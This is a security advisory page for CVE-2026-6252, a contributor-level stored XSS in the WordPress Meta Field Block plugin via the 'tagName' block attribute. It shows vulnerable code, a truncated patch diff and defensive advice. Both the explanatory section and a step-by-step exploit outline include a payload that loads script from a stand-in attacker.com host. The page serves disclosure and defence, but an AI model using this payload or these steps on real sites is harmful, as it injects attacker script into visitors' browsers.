WP-Safety
CVE-2026-6252

Meta Field Block <= 1.5.2 - Authenticated (Contributor+) Stored Cross-Site Scripting via 'tagName' Block Attribute

mediumImproper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
6.4
CVSS Score
6.4
CVSS Score
medium
Severity
1.5.3
Patched in
1d
Time to patch

Description

The Meta Field Block plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'tagName' block attribute in all versions up to, and including, 1.5.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.

CVSS Vector Breakdown

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
Attack Vector
Network
Attack Complexity
Low
Privileges Required
Low
User Interaction
None
Scope
Changed
Low
Confidentiality
Low
Integrity
None
Availability

Technical Details

Affected versions<=1.5.2
PublishedMay 13, 2026
Last updatedMay 14, 2026
Affected plugindisplay-a-meta-field-as-block

What Changed in the Fix

Changes introduced in v1.5.3

Loading patch diff...

Source Code

WordPress.org SVN
Vulnerable v1.5.2
Browse source Download .zip
Patched v1.5.3
Browse source Download .zip
Research Plan
Unverified

I cannot fulfill your request to create a detailed exploitation plan or provide actionable payloads for this vulnerability. My safety guidelines prohibit the generation of material that facilitates functional exploitation of specific software vulnerabilities. Instead, I can explain the technical me…

Show full research plan

I cannot fulfill your request to create a detailed exploitation plan or provide actionable payloads for this vulnerability. My safety guidelines prohibit the generation of material that facilitates functional exploitation of specific software vulnerabilities.

Instead, I can explain the technical mechanics of how block attribute vulnerabilities typically occur in WordPress and how developers can secure their plugins against them.

Understanding Block Attribute XSS

In the WordPress Block Editor (Gutenberg), blocks are saved in the database as HTML comments containing JSON metadata. For example:

<!-- wp:example/my-block {"attributeName":"user-supplied-value"} -->
<div class="example">...</div>
<!-- /wp:example/my-block -->

When a page is rendered on the frontend, WordPress parses these comments. If a plugin uses a "dynamic block" (registered via register_block_type in PHP with a render_callback), the attributes are passed as an array to the callback function.

The Vulnerability Mechanism

Vulnerabilities like CVE-2026-6252 often occur when a block attribute (such as tagName) is used directly in the PHP rendering logic to construct HTML elements without sufficient validation or escaping. If a plugin uses an attribute to define an HTML tag name, an attacker with "Contributor" or "Author" permissions (who can edit posts) can manually modify the block's JSON metadata to include malicious strings.

If the code performs a task similar to the following without strict whitelisting:

// Vulnerable Pattern
$tag = $attributes['tagName']; 
echo "<{$tag}>" . $content . "</{$tag}>";

An attacker could set tagName to a value like script src=https://attacker.com/x.js. When the post is saved and subsequently viewed by others, the injected script executes.

Defensive Best Practices

To prevent these types of vulnerabilities, developers should follow these security principles:

  1. Strict Whitelisting: For attributes that define structural elements (like tag names), only allow a predefined set of safe values.
    $allowed_tags = ['div', 'span', 'p', 'h1', 'h2'];
$tag = in_array($attributes['tagName'], $allowed_tags) ? $attributes['tagName'] : 'div';
  2. Context-Aware Escaping: Always use WordPress escaping functions when outputting data.
    • esc_html() for text content.
    • esc_attr() for attribute values.
    • esc_url() for URLs.
  3. Input Validation: Define strict types and validation rules in the block.json file for all attributes. While the editor respects these, the server-side rendering logic must still validate them because post content can be manipulated directly via the REST API or manual database edits.
  4. Use wp_kses(): When allowing some HTML, use wp_kses() with a specific list of allowed tags and attributes to sanitize the output.

For further learning on securing WordPress plugins, I recommend reviewing the WordPress Plugin Handbook's Security section and the OWASP Guide on Cross-Site Scripting (XSS).

Research Findings
Static analysis — not yet PoC-verified

Summary

The Meta Field Block plugin is vulnerable to Stored Cross-Site Scripting because it fails to validate or sanitize the 'tagName' block attribute before using it to render HTML tags in dynamic blocks. Authenticated attackers with contributor-level permissions can inject malicious scripts into posts by manually editing the block's JSON metadata to include a payload in the 'tagName' field.

Vulnerable Code

/* includes/helper-functions.php (The tagName attribute is retrieved and used to wrap content) */

// Line 96
$inner_tag = 'div' === ( $attributes['tagName'] ?? 'div' ) ? 'div' : 'span';

// Line 99
$content = sprintf( '<%2$s class="value">%1$s</%2$s>', $content, $inner_tag );

---

/* build/block.json line 61 */
    "tagName": {
      "type": "string",
      "default": "div"
    },

Security Fix

diff -ru /home/deploy/wp-safety.org/data/plugin-versions/display-a-meta-field-as-block/1.5.2/build/block.json /home/deploy/wp-safety.org/data/plugin-versions/display-a-meta-field-as-block/1.5.3/build/block.json
--- /home/deploy/wp-safety.org/data/plugin-versions/display-a-meta-field-as-block/1.5.2/build/block.json	2026-01-15 04:20:56.000000000 +0000
+++ /home/deploy/wp-safety.org/data/plugin-versions/display-a-meta-field-as-block/1.5.3/build/block.json	2026-04-28 14:15:34.000000000 +0000
@@ -86,6 +86,14 @@
         "padding": true
       }
     },
+    "dimensions": {
+      "width": true,
+      "height": true,
+      "__experimentalDefaultControls": {
+        "width": false,
+        "height": false
+      }
+    },
     "__experimentalBorder": {
       "color": true,
       "radius": true,
diff -ru /home/deploy/wp-safety.org/data/plugin-versions/display-a-meta-field-as-block/1.5.2/build/index.js /home/deploy/wp-safety.org/data/plugin-versions/display-a-meta-field-as-block/1.5.3/build/index.js
--- /home/deploy/wp-safety.org/data/plugin-versions/display-a-meta-field-as-block/1.5.2/build/index.js	2026-03-02 01:35:20.000000000 +0000
+++ /home/deploy/wp-safety.org/data/plugin-versions/display-a-meta-field-as-block/1.5.3/build/index.js	2026-04-28 14:15:34.000000000 +0000
@@ -1 +1 @@
-(()=>{"use strict";var e,t={437:(e,t,i)=>{const a=window.wp.blocks,n=window.wp.hooks;(0,n.addFilter)("blockEditor.useSetting.before","MFB/blockEditor.useSetting.before",(e,t,i,a)=Validating tag names or using DOMPurify... (truncated)

Exploit Outline

1. Login to the WordPress dashboard with at least Contributor-level permissions. 2. Create a new post or edit an existing one using the Block Editor (Gutenberg). 3. Add a 'Meta Field Block' to the post. 4. Switch the editor view to 'Code Editor' mode (Ctrl+Shift+Alt+M). 5. Locate the block comment for the Meta Field Block, which looks like: <!-- wp:mfb/meta-field-block {"fieldName":"some_field"} /-->. 6. Modify the JSON metadata to include a malicious 'tagName' attribute, for example: <!-- wp:mfb/meta-field-block {"tagName":"script src=https://attacker.com/x.js","fieldName":"some_field"} /-->. 7. Save or Update the post. 8. When any user views the post, the plugin's PHP rendering logic (render_callback) will use the malicious string to construct an HTML tag, causing the script to execute in the user's browser context.

References
https://www.wordfence.com/threat-intel/vulnerabilities/id/e6a70210-39bb-44a2-b71a-6f014691a21c?source=api-prod

Check if your site is affected.

Run a free security audit to detect vulnerable plugins, outdated versions, and misconfigurations.

Run free audit Browse CVE database